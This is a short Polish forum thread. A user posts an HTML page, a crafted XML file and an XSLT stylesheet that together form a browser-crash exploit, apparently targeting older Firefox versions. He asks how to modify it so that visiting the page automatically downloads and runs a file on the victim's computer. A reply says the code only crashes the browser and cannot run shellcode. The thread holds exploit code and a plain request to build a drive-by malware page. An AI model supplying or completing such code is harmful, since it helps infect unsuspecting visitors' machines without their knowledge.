Exploit z uzyciem XML - pomocy.

Nologinneeded

Użytkownik
Dołączył
Marzec 28, 2009
Posty
1
Witam, wiem ze prawdopodobnie na tym forum nie otrzymam zadnej pomocy, przynajmniej kiedys tak bylo, ale warto sprobowac. Mam pewnego exploita i chcialbym wrzucic go na strone, ale w ktorym miejscu nalezy pozmieniac kod by automatycznie po wejsciu sciagalo i odpalalo plik ofierze.

Pierwszy plik html :
Kod:
<html>

<script>
    // k`sOSe - works both on windows and linux
    // heap spray here :)
</script>

<iframe src="xmlcrash.xml">


</html>

Plik xmlcrash.xml
Kod:
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="xslt.xsl"?>


<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <item1 id="AAAAAAA" />
    <item2 id="AAAAAAAAA" label="AAAAAAAAAAAA"/>
</root>

I plik xslt.xsl :
Kod:
<?xml version="1.0" encoding="UTF-8"?>

<xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

    <xsl:key name="label" match="item2" use="w00t()"/>

    <xsl:template match="root">
                    <xsl:for-each select="//item1">
                        <xsl:call-template name="item1" />
                    </xsl:for-each>
    </xsl:template>

    <xsl:template name="item1">
                <xsl:for-each select="key('label', 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')">
                </xsl:for-each>
    </xsl:template>

</xsl:stylesheet>

Jak ktos pomoze bede wdzieczny.
 

thc_flow

Zbanowany
Dołączył
Listopad 13, 2008
Posty
649
Z tego co widzę to ten kod nie służy do odpalenia shellcode'u a do zcrashowania przeglądarki, z tego co pamiętam to Firefoxa 3 i starszych. Poszukaj czegoś innego...
 
Do góry Bottom